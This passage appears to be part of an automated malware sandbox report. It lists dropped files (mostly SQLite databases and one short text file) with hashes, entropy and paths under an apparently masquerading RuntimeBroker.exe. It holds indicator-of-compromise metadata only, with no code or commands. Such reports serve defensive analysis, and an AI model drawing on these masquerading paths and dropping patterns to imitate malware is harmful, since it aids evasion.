                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):25
                                                                                  Entropy (8bit):4.293660689688185
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:cm9NTHfQk:cm9Nbb
                                                                                  MD5:9A7541C883AC07E2DEB75C8A8F762ABF
                                                                                  SHA1:B714E84F6179400C60B11798435B436DB3DCC0B0
                                                                                  SHA-256:03AC60EFB1C97CAA9F68B4941F33D6E97EB2FE7D46A44FC4CA08504222D64269
                                                                                  SHA-512:82019B2950675346BA4E1FF383835FF85EEF3AB9A39FCCEF72ABD3D7B155B8F975CB3577892D3FA45508BE64CBE3DD3F54F502ED06FB747D73188966F5949BEC
                                                                                  Malicious:false
                                                                                  Preview:28klMMSgTRGqQEmMqPrbkUuXc
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
